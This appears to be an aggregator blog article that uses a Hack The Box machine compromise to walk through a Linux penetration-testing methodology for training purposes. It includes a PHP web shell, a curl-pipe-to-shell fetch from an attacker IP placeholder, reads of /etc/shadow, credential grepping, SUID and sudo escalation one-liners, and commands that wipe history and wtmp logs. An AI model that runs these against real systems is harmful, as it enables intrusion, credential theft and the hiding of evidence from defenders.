The Unseen Kill Chain: How I Pwned an HTB Machine and What It Reveals About Modern Linux Threats + Video

Listen to this Post

Featured Image

Introduction:

Penetration testing platforms like Hack The Box have become the modern-day proving ground for cybersecurity professionals, simulating real-world attacks in controlled environments. Successfully compromising a machine, such as the “FACTS” box in HTB’s Season 10, requires a blend of systematic reconnaissance, vulnerability exploitation, and post-compromise privilege escalation. This article deconstructs the underlying methodologies and technical commands that lead to such a “pwn,” transforming a celebratory post into a actionable learning blueprint for red teams and blue teams alike.

Learning Objectives:

  • Understand the core methodology for approaching an unknown HTB/Linux machine.
  • Learn practical commands for reconnaissance, exploitation, and privilege escalation on Linux systems.
  • Identify common misconfigurations and vulnerabilities that lead to full system compromise.

You Should Know:

1. The Reconnaissance Phase: Mapping the Attack Surface

Every successful penetration test begins with thorough enumeration. Before attacking, you must discover what you’re facing.

Step‑by‑step guide explaining what this does and how to use it.
Network Scanning: Use `nmap` to discover open ports and services.

 Aggressive scan for top 1000 ports with service detection
nmap -sV -sC -O -T4 <TARGET_IP>

Full TCP port scan (slower but thorough)
nmap -p- -T4 <TARGET_IP>

UDP scan for critical services (DNS, SNMP)
sudo nmap -sU --top-ports 100 <TARGET_IP>

Web Application Enumeration: If HTTP/HTTPS ports are open, enumerate directories, subdomains, and technologies.

 Directory brute-forcing with Gobuster
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt

Technology fingerprinting with WhatWeb
whatweb http://<TARGET_IP>

2. Initial Foothold: Exploiting the First Vulnerability

The initial breach often comes from a vulnerable service or web application.

Step‑by‑step guide explaining what this does and how to use it.
Analyzing Service Versions: Cross-reference discovered service versions (from nmap -sV) with databases like Exploit-DB or Searchsploit.

 Search for exploits locally using Searchsploit
searchsploit "Apache 2.4.49"

Examine a specific exploit
searchsploit -x 12345

Web Exploitation – File Upload Bypass: A common vector. If you find an upload function, test for bypasses.

<!-- Sample malicious PHP shell for upload -->
<?php system($_GET['cmd']); ?>

Try extensions: .php5, .phtml, .phar, or double extensions: shell.php.jpg.
Use Burp Suite to intercept and modify the `Content-Type` header to image/jpeg.

3. Establishing a Stable Shell: Upgrading Your Access

A basic web shell is unstable. Upgrade to a fully interactive TTY shell.

Step‑by‑step guide explaining what this does and how to use it.

 On the victim machine, after gaining command execution:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Background the shell with Ctrl+Z, then on your attacker machine:
stty raw -echo; fg

Then reset the terminal and export environment variables
reset
export TERM=xterm
export SHELL=bash
stty rows 38 columns 116

4. Post-Exploitation Enumeration: Hunting for Privilege Escalation Vectors

The key to going from user to root lies in meticulous internal enumeration.

Step‑by‑step guide explaining what this does and how to use it.

Manual Linux Enumeration:

 Check sudo permissions
sudo -l

Look for SUID/SGID binaries
find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -g=s 2>/dev/null

Check for world-writable files or directories
find / -type f -perm -o=w 2>/dev/null

Look for cron jobs
crontab -l
ls -la /etc/cron

Check for readable sensitive files
cat /etc/passwd
cat /etc/shadow 2>/dev/null

Automated Enumeration Scripts: Use tools like LinPEAS for a comprehensive sweep.

 Transfer LinPEAS to the victim machine
curl -L http://<ATTACKER_IP>/linpeas.sh | sh

5. Privilege Escalation: Exploiting Misconfigurations

A common vector is exploiting a SUID binary or a writable service running as root.

Step‑by‑step guide explaining what this does and how to use it.
SUID Binary Exploit (e.g., find): If `find` has the SUID bit set, you can escalate.

 Using find to spawn a root shell
find / -exec /bin/sh \; -quit

Exploiting Sudo Rights (e.g., vi/vim): If a user can run `vi` as root via sudo.

sudo vim -c ':!/bin/sh'

Kernel Exploitation: As a last resort, if a kernel vulnerability exists.

 Identify kernel version
uname -a

Search for appropriate exploit, compile, and run
gcc exploit.c -o exploit
chmod +x exploit
./exploit
  1. Lateral Movement & Pivoting (If Applicable in the Network)
    In more complex environments, you may need to move from one compromised host to another.

Step‑by‑step guide explaining what this does and how to use it.
Dumping Credentials: Search for passwords in config files, history, or memory.

 Search for files containing the word "password"
grep -ri "password" /home /opt /var/www 2>/dev/null

Check bash history
cat ~/.bash_history

SSH Pivoting: Use SSH to create a tunnel to access an internal network.

 Create a dynamic SOCKS proxy via the compromised host
ssh -D 1080 user@<COMPROMISED_IP> -f -N
 Then configure proxychains to route tools through this tunnel
  1. Covering Tracks & Forensic Awareness (For CTFs & Ethical Practice)
    Understanding how attacks are logged is crucial for both attackers and defenders.

Step‑by‑step guide explaining what this does and how to use it.

Clearing Logs (Demonstrative):

 Clear current user's history
history -c

Overwrite and delete the history file
shred -zu ~/.bash_history

Remove a user's entry from wtmp/lastlog (requires root)
echo "" > /var/log/wtmp

Note: In real engagements, this is done only within strict rules of engagement. In CTFs like HTB, it’s often unnecessary.

What Undercode Say:

  • Methodology Over Tools: The specific tool matters less than the underlying process: Recon, Foothold, Enumeration, Escalation. Mastering this cycle is more valuable than memorizing a thousand exploits.
  • Context is King: Automated scripts like LinPEAS are invaluable, but they generate noise. The real skill lies in manually interpreting findings—understanding why a writable cron job or a specific SUID binary is a critical vulnerability in that particular system’s context.

Analysis: Jean Hurtado’s post, adorned with certifications like eJPTv2 and ISO 27001, underscores a vital trend: the cybersecurity industry increasingly values demonstrable, hands-on skill alongside formal knowledge frameworks. Platforms like Hack The Box bridge the gap between theory and the chaotic reality of offensive security. The “FACTS” machine compromise isn’t just a badge; it’s a microcosm of a real-world attack chain, from external enumeration to root dominance. It highlights that persistent threats often stem not from zero-days, but from unpatched services, misconfigurations, and weak credential hygiene—all issues that robust internal enumeration can uncover.

Prediction:

The future of penetration testing and threat simulation will be deeply intertwined with AI and automation. We will see AI-assisted reconnaissance that dynamically prioritizes attack vectors, and automated penetration testing platforms that can continuously probe for new vulnerabilities as systems update. However, the human element—the creative thinking required to chain together unconventional vulnerabilities, as often needed in HTB—will remain irreplaceable. The rise of these platforms will consequently push the industry towards a “continuous penetration testing” model, integrating red team tactics directly into DevOps (DevSecOps) pipelines, making security an ongoing, dynamic process rather than a periodic audit.

▶️ Related Video (72% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Jean Hurtado – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky